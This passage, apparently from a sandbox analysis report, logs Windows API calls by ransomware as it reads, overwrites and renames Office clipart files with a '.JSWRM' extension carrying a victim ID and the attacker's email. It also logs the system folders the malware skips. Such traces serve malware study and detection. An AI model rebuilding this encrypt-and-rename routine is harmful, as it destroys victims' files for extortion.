0x240fe8 [0100.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00780L.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB00780L.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB00780L.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0100.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0100.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0100.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0100.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00780L.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00780l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.037] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=8079) returned 1 [0100.037] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1f80) returned 0x24d210 [0100.037] ReadFile (in: hFile=0x338, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1f80, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e534*=0x1f80, lpOverlapped=0x0) returned 1 [0100.039] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.039] WriteFile (in: hFile=0x338, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1f80, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e530*=0x1f80, lpOverlapped=0x0) returned 1 [0100.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.039] CloseHandle (hObject=0x338) returned 1 [0100.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0100.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0100.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0100.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0100.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0100.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0100.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0100.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0100.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.039] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00780L.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00780l.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB00780L.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb00780l.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0100.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0100.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0100.040] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110a3267, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110a3267, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110a3267, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xe1d, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB01741L.GIF", cAlternateFileName="")) returned 1 [0100.040] lstrcmpiW (lpString1="WB01741L.GIF", lpString2=".") returned 1 [0100.040] lstrcmpiW (lpString1="WB01741L.GIF", lpString2="..") returned 1 [0100.040] lstrcmpiW (lpString1="WB01741L.GIF", lpString2="...") returned 1 [0100.040] lstrcmpiW (lpString1="WB01741L.GIF", lpString2="windows") returned -1 [0100.040] lstrcmpiW (lpString1="WB01741L.GIF", lpString2="recovery") returned 1 [0100.040] lstrcmpiW (lpString1="WB01741L.GIF", lpString2="perflogs") returned 1 [0100.040] lstrcmpiW (lpString1="WB01741L.GIF", lpString2="documents and settings") returned 1 [0100.040] lstrcmpiW (lpString1="WB01741L.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.040] lstrcmpiW (lpString1="WB01741L.GIF", lpString2="system volume information") returned 1 [0100.040] lstrcmpiW (lpString1="WB01741L.GIF", lpString2="msocache") returned 1 [0100.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01741L.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01741L.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01741L.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01741L.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01741L.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01741L.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0100.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0100.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0100.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB01741L.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb01741l.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.041] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3613) returned 1 [0100.041] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe10) returned 0x24d210 [0100.041] ReadFile (in: hFile=0x338, lpBuffer=0x24d210, nNumberOfBytesToRead=0xe10, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e534*=0xe10, lpOverlapped=0x0) returned 1 [0100.043] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.043] WriteFile (in: hFile=0x338, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xe10, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e530*=0xe10, lpOverlapped=0x0) returned 1 [0100.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.043] CloseHandle (hObject=0x338) returned 1 [0100.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0100.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0100.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0100.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0100.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0100.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0100.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0100.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0100.044] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB01741L.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb01741l.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB01741L.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb01741l.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0100.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0100.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0100.044] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110a3267, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x38c, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB02039_.GIF", cAlternateFileName="")) returned 1 [0100.044] lstrcmpiW (lpString1="WB02039_.GIF", lpString2=".") returned 1 [0100.044] lstrcmpiW (lpString1="WB02039_.GIF", lpString2="..") returned 1 [0100.044] lstrcmpiW (lpString1="WB02039_.GIF", lpString2="...") returned 1 [0100.044] lstrcmpiW (lpString1="WB02039_.GIF", lpString2="windows") returned -1 [0100.044] lstrcmpiW (lpString1="WB02039_.GIF", lpString2="recovery") returned 1 [0100.044] lstrcmpiW (lpString1="WB02039_.GIF", lpString2="perflogs") returned 1 [0100.045] lstrcmpiW (lpString1="WB02039_.GIF", lpString2="documents and settings") returned 1 [0100.045] lstrcmpiW (lpString1="WB02039_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.045] lstrcmpiW (lpString1="WB02039_.GIF", lpString2="system volume information") returned 1 [0100.045] lstrcmpiW (lpString1="WB02039_.GIF", lpString2="msocache") returned 1 [0100.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0100.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02039_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02039_.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02039_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0100.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0100.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02039_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02039_.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02039_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0100.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0100.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0100.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0100.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02039_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02039_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.048] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=908) returned 1 [0100.048] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x380) returned 0x20e550 [0100.049] ReadFile (in: hFile=0x338, lpBuffer=0x20e550, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e534*=0x380, lpOverlapped=0x0) returned 1 [0100.050] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.050] WriteFile (in: hFile=0x338, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e530*=0x380, lpOverlapped=0x0) returned 1 [0100.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0100.051] CloseHandle (hObject=0x338) returned 1 [0100.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0100.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0100.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0100.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0100.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0100.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0100.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.051] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02039_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02039_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02039_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02039_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0100.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0100.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0100.052] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1107d049, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1107d049, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110a3267, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x987, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB02055_.GIF", cAlternateFileName="")) returned 1 [0100.052] lstrcmpiW (lpString1="WB02055_.GIF", lpString2=".") returned 1 [0100.052] lstrcmpiW (lpString1="WB02055_.GIF", lpString2="..") returned 1 [0100.052] lstrcmpiW (lpString1="WB02055_.GIF", lpString2="...") returned 1 [0100.052] lstrcmpiW (lpString1="WB02055_.GIF", lpString2="windows") returned -1 [0100.052] lstrcmpiW (lpString1="WB02055_.GIF", lpString2="recovery") returned 1 [0100.052] lstrcmpiW (lpString1="WB02055_.GIF", lpString2="perflogs") returned 1 [0100.052] lstrcmpiW (lpString1="WB02055_.GIF", lpString2="documents and settings") returned 1 [0100.052] lstrcmpiW (lpString1="WB02055_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.052] lstrcmpiW (lpString1="WB02055_.GIF", lpString2="system volume information") returned 1 [0100.052] lstrcmpiW (lpString1="WB02055_.GIF", lpString2="msocache") returned 1 [0100.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0100.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02055_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02055_.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02055_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0100.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0100.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02055_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02055_.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02055_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0100.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0100.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0100.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.053] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0100.053] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02055_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02055_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.053] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2439) returned 1 